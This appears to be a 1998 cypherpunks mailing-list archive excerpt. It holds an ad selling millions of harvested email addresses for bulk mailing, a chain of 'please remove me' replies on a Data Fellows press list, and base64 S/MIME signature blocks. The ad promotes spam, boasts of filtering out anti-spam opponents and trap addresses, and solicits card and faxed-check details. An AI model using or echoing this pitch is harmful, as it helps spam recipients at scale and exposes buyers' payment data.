7UCeTcR4qIbs6SxQv6b5DduwpkowggIxMIIBmgIFAqQAAAEwDQYJKoZIhvcN
AQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMu
MTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRp
b24gQXV0aG9yaXR5MB4XDTk2MDEyOTAwMDAwMFoXDTk5MTIzMTIzNTk1OVow
XzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTcwNQYD
VQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0
aG9yaXR5MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDlGb9to1ZhLZlI
cfZn3rmN67eehoAKkQ76OCWvRoiC5XOooJskXQ0fzGVuDLDQVoQYh5oGmxCh
c9+0WDlrbsH2FdWoqD+qEgaNMax/sDTXjzRniAnNFBHiTkVWaR94AoDa3EeR
Kbs2yWNcxeDXLYd7obcysHswuiovMaruo2fa2wIDAQABMA0GCSqGSIb3DQEB
AgUAA4GBAFJzuppV3Nw/gn2wkJhiKoJMdgBuJT3VwglwVwEMD3cfGKH7HGAO
oHU7SSFB/qdcLUxCSdP/KNiM6p3+yQfid4JTI95V885Ek/r6TL3KNvNbZrKe
yPIMXl7UobQhCTPKO1n8ksI4/K3ZliTgLfqjKfUzaHhOtLyfaTXiqJiUczvE
MYIB0DCCAcwCAQEwdjBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMO
VmVyaVNpZ24sIEluYy4xNDAyBgNVBAsTK1ZlcmlTaWduIENsYXNzIDEgQ0Eg
LSBJbmRpdmlkdWFsIFN1YnNjcmliZXICEAnBxChHFXu5Gq1YD9qV4U8wCQYF
Kw4DAhoFAKCBsTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw05ODEyMDExNjIwMTZaMCMGCSqGSIb3DQEJBDEWBBTqA59FKAVu
APp3cQRcropf9EGzwzBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDAHBgUrDgMCBzANBggqhkiG9w0DAgIBQDANBggqhkiG
9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgLsANR5X3iftXFzYLHzZdbQYq5gQ
NFYxVarzqr9LgYgQzTKBTMH9oYxfjlLrpgKvsr3Bu2kTg8xCcUMWguNfQRO5
8jkyxZiQUxAlJIibMuUbi8YVBg67uhGmWtV3ZKRdHpnBthUDLK7VhE1g0eO6
YjDx27D1yhlzgs7mX9kfpVS1
--Boundary..3999.1071713824.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vaneijk59@sara.nl
Date: Mon, 30 Nov 1998 16:10:47 -0800 (PST)
Subject: No Subject
Message-ID: <199811302354.IAA00671@sy-name.kure-j.ac.jp>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 6770
Lines: 172


addresses like CompuServe, MCI, ANON's, etc.  This causes a 
tremendous amount of undeliverables.

After completion of removal of duplicates and initial filtering we were 
left with the base of 10 Million addresses worth fine tuning to finish the 
project.  Remember, we are not here to produce the CD with the gad zillion 
millions that our competitors are so proud to put their names on these days.  
We ARE here to produce the very BEST CD list as far as quality of 
addresses go

We then ran a program that contained 300+ keywords to remove addresses
with vulgarity,  profanity, sex-related names, postmaster, webmaster, flamer, 
abuse, spam, etc., etc.   Also eliminated all .EDU, mil, .org, .GOV, Genie, 
Delphi, GNN, Wow etc.   We also filtered out all addresses found in any of 
our 1300+ domains list.  We also filtered out addresses in excess of 30,000 
which have proven to be affiliated with anyone found to be opposed to our 
using direct bulk email as a advertising medium. We have also purged the 
list to be free of any "web poison" addresses created by those who are opposed 
to us conducting legitimate business on the internet today.  If you do not know 
what web poisoned addresses are, please look it up now.  One list we recently 
purchased had over 90% poisoned addresses.  The "bottom line" here is that 
you can go out on the world market today and purchase every lists for thousands 
of dollars and NOT have anymore worth owning than what we have compiled 
for you here today.

You use these addresses, you will experience increased response, increased 
sales, and a host of other positives that far exceeds any hoped for results when 
using the competitor's inferior products.  Our customers purchase our products 
over and over and over.  Most of the competition ever succeeds is selling a 
second product to anyone after they purchase the first.

  So, you see, our list will save people hundreds of dollars buying all others that are 
out there on  CD and otherwise. Using ours will be like using the 200+ million that 
we started with, but a lot less money and a lot less time!!
 
We have always said, "You can buy from the REST or you can buy from the BEST".   
Your choice.

                     _____________________________

                       What others are saying:

"I received the CD on Friday evening.   Like a kid with a new toy, I
 immediately started bulking out using the new email addresses.  Over
 the course of the weekend, I emailed out over 500,000 emails and I
 received less than TWENTY undeliverables!!  I am totally satisfied
with my purchase!!  Thanks Premier!!"
                              Dave Buckley
                              Houston,  TX
 
 "This list is worth it's weight in gold!!  I sent out 100,000 emails for my
 product and received over 55 orders!
                               Ann Colby
                            New Orleans, LA
 
                ****************************************
 
                                 HERE'S THE BOTTOM LINE
 
The CD is comprised of 7 million PREMIUM & SUPER clean addresses -ready 
for mailing upon receipt of the CD.  Each file contains exactly 100,000 email 
addresses. There are only AOL & Mixed addresses on this CD.  You have 50 files 
of 100,000 each of AOL to equal 5,000,000 addresses.  The AOL addresses are less 
than 6 weeks old and have been collected throughout the production schedule.
 
The remaining files are comprised of General Internet addresses. There are 20 files 
of 100,000 each, totaling 2,000,000 premium addresses.   NO Compuserve!  No Delphi!
No Genie!  No Prodigy!  NO Filler Addresses!  Simply the Best of the Best!!!

 
                           >>> ONLY $200.00!
 
This price is effective for the next seven days, thereafter the price will be
$299.00 so ORDER NOW!  Remember, bottom-line you always get what you pay for!

All lists are completely free of any Duplicates. We also on a continual basis, add 
New Names and Remove Undeliverables and Remove Requests. The result is the 
Cleanest Email Addresses Available Anywhere to use over and over again, for a 
FRACTION of the cost that other companies charge. Typical rates for acquiring 
email lists are from 1cent to as high as 3 cents per email  address - that's  
"INFORMATION HIGHWAY" ROBBERY!.

We continually work on our CD.  Who knows when those other CDs were made. 
We're constantly adding and deleting addresses, removes. Etc.  It all comes back 
to quality.

Don't even hesitate on this one or you will miss out on the most effective way to 
market anywhere...PERIOD!  If you have any further questions or to place an order, 
you can call toll free at:

800-600-0343  Ext. 2693


To order our email package, simply print out the EZ ORDER FORM
below and fax or mail it to our office today.
 
We accept Visa, Mastercard, AMEX, Checks by Fax.
 
 _________________
EZ Order Form
 

 _____Yes! I would like to order MILLIONS Vol. 2  email addresses
for only $200.00.
 
*Please select one of the following for shipping..
 
____I would like to receive my package OVERNIGHT. I'm including
$15 for shipping. (outside US add an additional $25 for shipping)
 
____I would like to receive my package 2 DAY delivery. I'm including
$10 for shipping.  (outside US add an additional $25 for shipping)
 
DATE_____________________________________________________
 
NAME____________________________________________________

COMPANY NAME___________________________________________

ADDRESS_________________________________________________

CITY, STATE, ZIP___________________________________________
 
PHONE NUMBERS__________________________________________
 
FAX NUMBERS_____________________________________________
 
EMAIL ADDRESS___________________________________________
 
TYPE OF CREDIT CARD:
 
______VISA _____MASTERCARD
 
CREDIT CARD# __________________________________________
 
EXPIRATION DATE________________________________________
 
NAME ON CARD___________________________________________
 
AMOUNT $____________________
 
 
(Required) SIGNATURE:x________________________
 
DATE:x__________________
 
You may fax your order to us at:   1-212-504-8192
 

CHECK BY FAX SERVICES!
 
If you would like to fax a check, paste your check below and fax it to
our office along with all forms to: 1-212-504-8192

******************************************************

***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 
CHECK HERE AND FAX IT TO US AT 1-212-504-8192
 
*******************************************************
 
If You fax a check, there is no need for you to send the original check.
We will draft up a new check, with the exact information from your
original check. All checks will be held for bank clearance.  (7-10 days)
Make payable to: "GD Publishing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ayoub, Mark  (CAP, FLEET)" <Mark.Ayoub@fleet.gecapital.com>
Date: Tue, 1 Dec 1998 08:25:43 -0800 (PST)
To: "'press-english-technical@lists.datafellows.com>
Subject: RE: bonjour
Message-ID: <95BE2E8C74BED1118C830001FAF8360811DDE2@catormp01cflsge.fleet.capital.ge.com>
MIME-Version: 1.0
Content-Type: text/plain


Please do not click on REPLY ALL, click on REPLY only, otherwise EVERYBODY
on the mailing list receives a copy of your message.

-----Original Message-----
From: falcon falcon [mailto:falconinc@earthlink.net]
Sent: Tuesday, December 01, 1998 11:19 AM
To: press-english-technical@lists.datafellows.com
Subject: Re: bonjour


please remove my name from your email list.

Thierry Roch wrote:

> Ici tout va bien, merci.
>
> On espre qu'une version fiable pour windows sortira un jour
> Salut
> ________________________________________
> roch@liberation.fr
> Tel : +33 (0) 1 42 76 17 68 - Fax: +33 (0) 1 42 76 02 24
> Informatique Libration http://www.liberation.fr






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ayoub, Mark  (CAP, FLEET)" <Mark.Ayoub@fleet.gecapital.com>
Date: Tue, 1 Dec 1998 08:40:23 -0800 (PST)
To: "'press-english-technical@lists.datafellows.com>
Subject: RE: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATESECURE VPN S...
Message-ID: <95BE2E8C74BED1118C830001FAF8360811DDE3@catormp01cflsge.fleet.capital.ge.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1310
Lines: 56


DO NOT HIT REPLY ALL, if you need to send an email send it to
mailto:Marita.Nasman-Repo@DataFellows.com.  Otherwise everybody on the
mailing list receive your message.

Mark Ayoub
GECFS PC Support

-----Original Message-----
From: Mark Denny [mailto:mad@mm-croy.mottmac.com]
Sent: Tuesday, December 01, 1998 11:28 AM
To: press-english-technical@lists.datafellows.com
Subject: RE: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO
CREATESECURE VPN S...


===== Original Message from PRESS-EN @ INTERNET 
{press-english-technical@lists.datafellows.com} at 1/12/98 16:21
>Same request. May I be removed from this list as well?
>
>
>
>
>falcon falcon <falconinc@earthlink.net> on 12/01/98 11:20:14 AM
>
>Please respond to press-english-technical@lists.datafellows.com
>
>To:   press-english-technical@lists.datafellows.com
>cc:
>bcc:  Evan Schuman/MHS/CMPNotes
>Subject:  Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE
>      SECURE VPN S...
>
>
>
>
>Please remove my name from your email list.
>
>
>Opencity@aol.com wrote:
>
>> Hi Mimmi
>>
>> Okay...this can be distributed as of today?
>>
>> Thanks
>> phil
===== Comments by MAD@MM-CROY (Mark Denny) at 1/12/98 16:27
Could you please stop sending me your emails. I think that some thing has 
gone wrong with your server.

Thanks.
Mark.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ayoub, Mark  (CAP, FLEET)" <Mark.Ayoub@fleet.gecapital.com>
Date: Tue, 1 Dec 1998 08:49:31 -0800 (PST)
To: "'press-english-technical@lists.datafellows.com>
Subject: RE: bonjour
Message-ID: <95BE2E8C74BED1118C830001FAF8360811DDE5@catormp01cflsge.fleet.capital.ge.com>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT HIT REPLY ALL, if you need to send an email send it to
mailto:Marita.Nasman-Repo@DataFellows.com.  Otherwise everybody on the
mailing list receive your message.

Mark Ayoub
GECFS PC Support

-----Original Message-----
From: "dan_verton"@fcw.com [mailto:"dan_verton"@fcw.com]
Sent: Tuesday, December 01, 1998 11:39 AM
To: press-english-technical@lists.datafellows.com
Subject: Re: bonjour


this is not my list and I want off as well.




falcon falcon <falconinc@earthlink.net> on 12/01/98 11:19:07 AM

Please respond to press-english-technical@lists.datafellows.com

To:   press-english-technical@lists.datafellows.com
cc:    (bcc: Dan Verton/FCW)
Subject:  Re: bonjour




please remove my name from your email list.

Thierry Roch wrote:

> Ici tout va bien, merci.
>
> On esp




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ayoub, Mark  (CAP, FLEET)" <Mark.Ayoub@fleet.gecapital.com>
Date: Tue, 1 Dec 1998 08:47:09 -0800 (PST)
To: "'press-english-technical@lists.datafellows.com>
Subject: RE: bonjour
Message-ID: <95BE2E8C74BED1118C830001FAF8360811DDE6@catormp01cflsge.fleet.capital.ge.com>
MIME-Version: 1.0
Content-Type: text/plain


DO NOT HIT REPLY ALL, if you need to send an email send it to
mailto:Marita.Nasman-Repo@DataFellows.com.  Otherwise everybody on the
mailing list receive your message.

Mark Ayoub
GECFS PC Support

-----Original Message-----
From: SimpleNet Informatica LTDA [mailto:dalmo@simp.net]
Sent: Tuesday, December 01, 1998 11:35 AM
To: press-english-technical@lists.datafellows.com
Subject: Re: bonjour


Remove me too !!!!!!!!!!!!!!

At 08:19 AM 12/1/98 -0800, you wrote:
>please remove my name from your email list.
>
>Thierry Roch wrote:
>
>> Ici tout va bien, merci.
>>
>> On espre qu'une version fiable pour windows sortira un jour
>> Salut
>> ________________________________________
>> roch@liberation.fr
>> Tel : +33 (0) 1 42 76 17 68 - Fax: +33 (0) 1 42 76 02 24
>> Informatique Libration http://www.liberation.fr
>
>
>Content-Type: application/x-pkcs7-signature; name="smime.p7s"

>Content-Disposition: attachment; filename="smime.p7s"
>Content-Description: S/MIME Cryptographic Signature
>
>Attachment Converted: c:\internet\eudora\attach\smime10.p7s
>
+===================================================+
 SimpleNet Informatica LTDA - mailto:simp@simp.net 
 Tel/Fax : (+55-21)509-0944
 http://www.simp.net/  Rio de Janeiro - Brazil      
 3com Partner - Cyclades Reseller - Wingate Reseller
 Attachmate Premium Partner Medallion - SCO Reseller              
+===================================================+
Visite o Rio de Janeiro : http://www.guiario.com.br
Sinalizando o Brasil em : http://www.signbrazil.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Opencity@aol.com
Date: Tue, 1 Dec 1998 07:51:33 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE SECURE VPN S...
Message-ID: <83cc5099.3664104d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 71
Lines: 10


Hi Mimmi

Okay...this can be distributed as of today?

Thanks
phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eschuman@cmp.com
Date: Tue, 1 Dec 1998 08:22:24 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE SECURE VPN S...
Message-ID: <852566CD.0059DBF4.00@NotesSMTP-01.cmp.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3999.1071713824.multipart/mixed"
Content-Length: 4595
Lines: 108

--Boundary..3999.1071713824.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Same request. May I be removed from this list as well?




falcon falcon <falconinc@earthlink.net> on 12/01/98 11:20:14 AM

Please respond to press-english-technical@lists.datafellows.com

To:   press-english-technical@lists.datafellows.com
cc:
bcc:  Evan Schuman/MHS/CMPNotes
Subject:  Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE
      SECURE VPN S...




Please remove my name from your email list.


Opencity@aol.com wrote:

> Hi Mimmi
>
> Okay...this can be distributed as of today?
>
> Thanks
> phil





--Boundary..3999.1071713824.multipart/mixed
Content-Type: application/octet-stream; name="bin00004.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00004.bin"
Content-Description: "smime.p7s"

MIIKmgYJKoZIhvcNAQcCoIIKizCCCocCAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCCJIwggPcMIIDRaADAgECAhAJwcQoRxV7uRqtWA/aleFPMA0G
CSqGSIb3DQEBBAUAMGIxETAPBgNVBAcTCEludGVybmV0MRcwFQYDVQQKEw5W
ZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVyaVNpZ24gQ2xhc3MgMSBDQSAt
IEluZGl2aWR1YWwgU3Vic2NyaWJlcjAeFw05ODAzMDkwMDAwMDBaFw05OTAz
MDkyMzU5NTlaMIIBHzERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZl
cmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0g
SW5kaXZpZHVhbCBTdWJzY3JpYmVyMUYwRAYDVQQLEz13d3cudmVyaXNpZ24u
Y29tL3JlcG9zaXRvcnkvQ1BTIEluY29ycC4gYnkgUmVmLixMSUFCLkxURChj
KTk2MTMwMQYDVQQLEypEaWdpdGFsIElEIENsYXNzIDEgLSBOZXRzY2FwZSBG
dWxsIFNlcnZpY2UxFjAUBgNVBAMTDURhdmlkIFdhbGxhY2UxJjAkBgkqhkiG
9w0BCQEWF2ZhbGNvbmluY0BlYXJ0aGxpbmsubmV0MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHI8H39EsMGyPI723JFjbKbLv2oGvzS8w9MjLQFKcp
P7CtfGeBKePW5X4kwAl8HgEnMuQ1Bmjf3qBk6bV4UE25akDg1H6Cxchr8Qqd
D8LWN0tTKZYoDWVP9upJRLqu29g1Z7ghMU/0DmPvXNNXELTFcIabeW7I7wjN
gQkiDUwFZwIDAQABo4HTMIHQMAkGA1UdEwQCMAAwga8GA1UdIASBpzCAMIAG
C2CGSAGG+EUBBwEBMIAwKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlz
aWduLmNvbS9DUFMwYgYIKwYBBQUHAgIwVjAVFg5WZXJpU2lnbiwgSW5jLjAD
AgEBGj1WZXJpU2lnbidzIENQUyBpbmNvcnAuIGJ5IHJlZmVyZW5jZSBsaWFi
LiBsdGQuIChjKTk3IFZlcmlTaWduAAAAAAAAMBEGCWCGSAGG+EIBAQQEAwIH
gDANBgkqhkiG9w0BAQQFAAOBgQA0UNlACbtKUQl/LE/fTo5i7EoDmNWId/za
tBau0Qbwe1RYE/d/0QPSHx8vaQb8wDSQeidR89jpUj9zco4CqLS6kDvmPAq5
GM8ifaxHvxWCsSzZH379kVNMl7nCEhIZS3KwRY7ZF0ZBnBNsha+gv1t66PiV
dXPIIGbVEnlz//yIHTCCAnkwggHioAMCAQICEFIfNR3ycH4AK77KWYcE1Tkw
DQYJKoZIhvcNAQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENl
cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTk2MDYyNzAwMDAwMFoXDTk5MDYy
NzIzNTk1OVowYjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5k
aXZpZHVhbCBTdWJzY3JpYmVyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC2FKbPTdAFDdjKI9BvqrQpkmOOLPhvltcunXZLEbE2jVfJw/0cxrr+Hgi6
M8qV6r7jW80GqLd5HUQq7XPysVKDaBBwZJHXPmv5912dFEObbpdFmIFH0S3L
3bty10w/cariQPJUObwW7s987LrbP2wqsxaxhhKdrpM01bjV0Pc+qQIDAQAB
ozMwMTAPBgNVHRMECDAGAQH/AgEBMAsGA1UdDwQEAwIBBjARBglghkgBhvhC
AQEEBAMCAQYwDQYJKoZIhvcNAQECBQADgYEAwfr3AudXyhF1xpwM+it3T4dF
Fzvj0sHaD1g5jq6VmQOhqKE4/nmakxcLl4Y5x8poNGa7x4hF9sgMBe6+lyXv
4NRu5H+ddlzOfboUoq4Ln/tnW0ilZyWvGWSI9nLYKSeqNxJqsSivJ4MYZWyN
7UCeTcR4qIbs6SxQv6b5DduwpkowggIxMIIBmgIFAqQAAAEwDQYJKoZIhvcN
AQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMu
MTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRp
b24gQXV0aG9yaXR5MB4XDTk2MDEyOTAwMDAwMFoXDTk5MTIzMTIzNTk1OVow
XzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTcwNQYD
VQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0
aG9yaXR5MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDlGb9to1ZhLZlI
cfZn3rmN67eehoAKkQ76OCWvRoiC5XOooJskXQ0fzGVuDLDQVoQYh5oGmxCh
c9+0WDlrbsH2FdWoqD+qEgaNMax/sDTXjzRniAnNFBHiTkVWaR94AoDa3EeR
Kbs2yWNcxeDXLYd7obcysHswuiovMaruo2fa2wIDAQABMA0GCSqGSIb3DQEB
AgUAA4GBAFJzuppV3Nw/gn2wkJhiKoJMdgBuJT3VwglwVwEMD3cfGKH7HGAO
oHU7SSFB/qdcLUxCSdP/KNiM6p3+yQfid4JTI95V885Ek/r6TL3KNvNbZrKe
yPIMXl7UobQhCTPKO1n8ksI4/K3ZliTgLfqjKfUzaHhOtLyfaTXiqJiUczvE
MYIB0DCCAcwCAQEwdjBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMO
VmVyaVNpZ24sIEluYy4xNDAyBgNVBAsTK1ZlcmlTaWduIENsYXNzIDEgQ0Eg
LSBJbmRpdmlkdWFsIFN1YnNjcmliZXICEAnBxChHFXu5Gq1YD9qV4U8wCQYF
Kw4DAhoFAKCBsTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw05ODEyMDExNjIwMTZaMCMGCSqGSIb3DQEJBDEWBBTqA59FKAVu
APp3cQRcropf9EGzwzBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDAHBgUrDgMCBzANBggqhkiG9w0DAgIBQDANBggqhkiG
9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgLsANR5X3iftXFzYLHzZdbQYq5gQ
NFYxVarzqr9LgYgQzTKBTMH9oYxfjlLrpgKvsr3Bu2kTg8xCcUMWguNfQRO5
8jkyxZiQUxAlJIibMuUbi8YVBg67uhGmWtV3ZKRdHpnBthUDLK7VhE1g0eO6
YjDx27D1yhlzgs7mX9kfpVS1
--Boundary..3999.1071713824.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "dan_verton"@fcw.com
Date: Tue, 1 Dec 1998 08:37:13 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: Re: bonjour
Message-ID: <852566CD.005B6DC4.00@zeus.fcw.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3999.1071713824.multipart/mixed"

--Boundary..3999.1071713824.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

this is not my list and I want off as well.




falcon falcon <falconinc@earthlink.net> on 12/01/98 11:19:07 AM

Please respond to press-english-technical@lists.datafellows.com

To:   press-english-technical@lists.datafellows.com
cc:    (bcc: Dan Verton/FCW)
Subject:  Re: bonjour




please remove my name from your email list.

Thierry Roch wrote:

> Ici tout va bien, merci.
>
> On esp


re qu'une version fiable pour windows sortira un jour
> Salut
> ________________________________________
> roch@liberation.fr
> Tel : +33 (0) 1 42 76 17 68 - Fax: +33 (0) 1 42 76 02 24
> Informatique Libration http://www.liberation.fr





--Boundary..3999.1071713824.multipart/mixed
Content-Type: application/octet-stream; name="bin00005.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00005.bin"
Content-Description: "smime.p7s"

MIIKmgYJKoZIhvcNAQcCoIIKizCCCocCAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCCJIwggPcMIIDRaADAgECAhAJwcQoRxV7uRqtWA/aleFPMA0G
CSqGSIb3DQEBBAUAMGIxETAPBgNVBAcTCEludGVybmV0MRcwFQYDVQQKEw5W
ZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVyaVNpZ24gQ2xhc3MgMSBDQSAt
IEluZGl2aWR1YWwgU3Vic2NyaWJlcjAeFw05ODAzMDkwMDAwMDBaFw05OTAz
MDkyMzU5NTlaMIIBHzERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZl
cmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0g
SW5kaXZpZHVhbCBTdWJzY3JpYmVyMUYwRAYDVQQLEz13d3cudmVyaXNpZ24u
Y29tL3JlcG9zaXRvcnkvQ1BTIEluY29ycC4gYnkgUmVmLixMSUFCLkxURChj
KTk2MTMwMQYDVQQLEypEaWdpdGFsIElEIENsYXNzIDEgLSBOZXRzY2FwZSBG
dWxsIFNlcnZpY2UxFjAUBgNVBAMTDURhdmlkIFdhbGxhY2UxJjAkBgkqhkiG
9w0BCQEWF2ZhbGNvbmluY0BlYXJ0aGxpbmsubmV0MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHI8H39EsMGyPI723JFjbKbLv2oGvzS8w9MjLQFKcp
P7CtfGeBKePW5X4kwAl8HgEnMuQ1Bmjf3qBk6bV4UE25akDg1H6Cxchr8Qqd
D8LWN0tTKZYoDWVP9upJRLqu29g1Z7ghMU/0DmPvXNNXELTFcIabeW7I7wjN
gQkiDUwFZwIDAQABo4HTMIHQMAkGA1UdEwQCMAAwga8GA1UdIASBpzCAMIAG
C2CGSAGG+EUBBwEBMIAwKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlz
aWduLmNvbS9DUFMwYgYIKwYBBQUHAgIwVjAVFg5WZXJpU2lnbiwgSW5jLjAD
AgEBGj1WZXJpU2lnbidzIENQUyBpbmNvcnAuIGJ5IHJlZmVyZW5jZSBsaWFi
LiBsdGQuIChjKTk3IFZlcmlTaWduAAAAAAAAMBEGCWCGSAGG+EIBAQQEAwIH
gDANBgkqhkiG9w0BAQQFAAOBgQA0UNlACbtKUQl/LE/fTo5i7EoDmNWId/za
tBau0Qbwe1RYE/d/0QPSHx8vaQb8wDSQeidR89jpUj9zco4CqLS6kDvmPAq5
GM8ifaxHvxWCsSzZH379kVNMl7nCEhIZS3KwRY7ZF0ZBnBNsha+gv1t66PiV
dXPIIGbVEnlz//yIHTCCAnkwggHioAMCAQICEFIfNR3ycH4AK77KWYcE1Tkw
DQYJKoZIhvcNAQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENl
cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTk2MDYyNzAwMDAwMFoXDTk5MDYy
NzIzNTk1OVowYjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5k
aXZpZHVhbCBTdWJzY3JpYmVyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC2FKbPTdAFDdjKI9BvqrQpkmOOLPhvltcunXZLEbE2jVfJw/0cxrr+Hgi6
M8qV6r7jW80GqLd5HUQq7XPysVKDaBBwZJHXPmv5912dFEObbpdFmIFH0S3L
3bty10w/cariQPJUObwW7s987LrbP2wqsxaxhhKdrpM01bjV0Pc+qQIDAQAB
ozMwMTAPBgNVHRMECDAGAQH/AgEBMAsGA1UdDwQEAwIBBjARBglghkgBhvhC
AQEEBAMCAQYwDQYJKoZIhvcNAQECBQADgYEAwfr3AudXyhF1xpwM+it3T4dF
Fzvj0sHaD1g5jq6VmQOhqKE4/nmakxcLl4Y5x8poNGa7x4hF9sgMBe6+lyXv
4NRu5H+ddlzOfboUoq4Ln/tnW0ilZyWvGWSI9nLYKSeqNxJqsSivJ4MYZWyN
7UCeTcR4qIbs6SxQv6b5DduwpkowggIxMIIBmgIFAqQAAAEwDQYJKoZIhvcN
AQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMu
MTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRp
b24gQXV0aG9yaXR5MB4XDTk2MDEyOTAwMDAwMFoXDTk5MTIzMTIzNTk1OVow
XzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTcwNQYD
VQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0
aG9yaXR5MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDlGb9to1ZhLZlI
cfZn3rmN67eehoAKkQ76OCWvRoiC5XOooJskXQ0fzGVuDLDQVoQYh5oGmxCh
c9+0WDlrbsH2FdWoqD+qEgaNMax/sDTXjzRniAnNFBHiTkVWaR94AoDa3EeR
Kbs2yWNcxeDXLYd7obcysHswuiovMaruo2fa2wIDAQABMA0GCSqGSIb3DQEB
AgUAA4GBAFJzuppV3Nw/gn2wkJhiKoJMdgBuJT3VwglwVwEMD3cfGKH7HGAO
oHU7SSFB/qdcLUxCSdP/KNiM6p3+yQfid4JTI95V885Ek/r6TL3KNvNbZrKe
yPIMXl7UobQhCTPKO1n8ksI4/K3ZliTgLfqjKfUzaHhOtLyfaTXiqJiUczvE
